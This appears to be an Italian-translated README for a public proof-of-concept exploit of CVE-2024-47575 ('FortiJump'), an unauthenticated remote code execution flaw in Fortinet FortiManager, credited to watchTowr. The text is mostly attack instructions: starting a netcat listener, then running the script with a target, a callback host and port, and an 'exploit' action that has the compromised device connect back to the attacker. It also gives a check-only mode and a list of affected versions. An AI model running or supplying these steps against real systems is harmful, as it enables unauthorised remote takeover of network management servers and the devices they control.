
Fortinet Fortimanager Esecuzione di codice remoto non autenticata AKA FortiJump CVE-2024-47575
Fortinet FortiManager Esecuzione di codice remoto non autenticata alias FortiJump CVE-2024-47575
Vedi il nostro post sul blog per i dettagli tecnici
Per iniziare, avvia la tua sessione ncat:
nc -lvvnp 80
Quindi, esegui il nostro generatore di artefatti di rilevamento:
python3 CVE-2024-47575.py --target 192.168.1.110 --lhost 192.168.1.53 --lport 80 --action exploit
Per verificare la sola vulnerabilità, usa le seguenti opzioni:
python3 CVE-2024-47575.py --target 192.168.1.110 --action check
FortiManager 7.6.0
FortiManager 7.4.0 through 7.4.4
FortiManager 7.2.0 through 7.2.7
FortiManager 7.0.0 through 7.0.12
FortiManager 6.4.0 through 6.4.14
FortiManager 6.2.0 through 6.2.12
FortiManager Cloud 7.4.1 through 7.4.4
FortiManager Cloud 7.2.1 through 7.2.7
FortiManager Cloud 7.0.1 through 7.0.12
FortiManager Cloud 6.4
Questo exploit è stato scritto da Sina Kheirkhah (@SinSinology) di watchTowr (@watchtowrcyber)
Per le ultime ricerche sulla sicurezza, segui il team watchTowr Labs